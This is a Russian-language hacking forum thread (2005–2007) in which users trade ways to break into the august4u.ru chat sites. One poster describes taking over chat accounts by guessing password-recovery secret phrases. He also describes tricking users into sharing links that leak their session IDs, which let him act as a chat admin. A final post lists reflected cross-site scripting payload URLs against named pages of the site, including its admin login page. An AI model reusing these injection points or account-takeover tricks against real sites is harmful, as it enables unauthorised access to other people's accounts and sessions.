А есть чего-нить на чатах august4u.ru?

А есть чего-нить на чатах august4u.ru?

09.12.2005, 01:24

~~Lord Nikon~~

Banned

Регистрация: 12.09.2005

Сообщений: 242

С нами: 10873826

Репутация: 22

А есть чего-нить на чатах august4u.ru?

Ребята помогите,не надо мне давать конкретно что делать просто скажите что тут возможно и объясните как сделать,пожалуйста помогите!!
Спасибо.
_http://russianchat.august4u.ru/

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось censored!; 09.12.2005 в 01:56..

11.12.2005, 15:33

TANZWUT

Крёстный отец :)

Регистрация: 22.06.2005

Сообщений: 1,330

С нами: 10991846

Репутация: 2054

вообщето что я описывал, часть уже залатали... ищемс новые...

__________________
Лучший способ защиты - это нападение!!!

12.12.2005, 06:34

~~forever777~~

Banned

Регистрация: 12.06.2005

Сообщений: 278

С нами: 11005958

Репутация: -1

Цитата:

Сообщение от tanzwut

вообщето что я описывал, часть уже залатали... ищемс новые...

если че найдешь отпишися очень интеренсо!! полюбому дырочки есть :d

23.12.2005, 14:43

TANZWUT

Крёстный отец :)

Регистрация: 22.06.2005

Сообщений: 1,330

С нами: 10991846

Репутация: 2054

Цитата:

Сообщение от forever777

если че найдешь отпишися очень интеренсо!! полюбому дырочки есть :d

есть тут у меня идейка одна, ес получится всё, то напишу.. после сесии займусь...

__________________
Лучший способ защиты - это нападение!!!

14.04.2007, 12:17

Аболтус

Новичок

Регистрация: 14.04.2007

Сообщений: 1

С нами: 10040326

Репутация: 0

Всем привет) заходил на форум только ради августовских чатов... общаюсь в них был админам одного

не скрою узнал много интересного... но Дело по моему пишет только "tanzwut" тебе мужик отдельный респект!

По аугусту похоже только эта тема открыта осталась... хотелось бы немножко добавить от себя)
про пароли и секретные фразы.. пароли естесно меняют все.. а вот к секретным фразам относяца не так внимательно) анкет админов правда не забирал... но в некоторых чатах угнал много(только ради спортивного интереса

и большенство по секретным фразам ака смена пароля) за частую это был или ник или имя)) еще насчет секретных враз.. тут в другом посте писали что: админ может востановить пароль по этой фразе.. но секретную фразу можно поменять вместе с паролем) про пароли вроди все сказал)
теперь собственно зачем заходил) ...
до сегодняшнего дня сессию и ид можно было узнать простым вопросом... типа: "слухай (по)друг(а) а дай ссылочку на творчество на первое произведение плиз))".. сам сегодня сидел под ником админа в одном чате... можно было делать всё.. кроме кила, удаления анкет и захода в админку(там похоже ип свиряица.. имхо) но тема прикрылась

( теперь только сессию можно так узнать, еще ее можно узнать спросив ссылку на смайлы... и собственно цель моего визита)
если кто нить знает как узнать ид пользователя(собеседника) напишите пожалуйста в личку! буду очень признателен! за сим откланяюсь пожелав всем удачи и дольнейших поисков багов))))

Вобщем от делать нечего

19.04.2007, 15:24

TANZWUT

Крёстный отец :)

Регистрация: 22.06.2005

Сообщений: 1,330

С нами: 10991846

Репутация: 2054

Вобщем от делать нечего

_http://august4u.ru/creation/write.inc?id="><script>alert(/bla/);</script>

_http://august4u.ru/creation/write.inc?preview=1&Name=Admin%20%CB%CE%D5
_http://august4u.ru/creation/write.inc?preview=1&sessname="><script>alert(/bla/);</script>

_http://august4u.ru/creation/write.inc?AuthorProfile=1&sessname="><script>alert (/bla/);</script>
_http://august4u.ru/creation/write.inc?AuthorProfile=1&id="><script>alert(/bla/);</script>

_http://august4u.ru/admin/auth/auth.php?AuthTitle=<script>alert(/bla/);</script>
_http://august4u.ru/admin/auth/auth.php?AuthError=<script>alert(/bla/);</script>

Летс Гоу..........

__________________
Лучший способ защиты - это нападение!!!

Последний раз редактировалось TANZWUT; 19.04.2007 в 15:30.. Причина: =)

Внести депозит

Депозит создан

Вывести депозит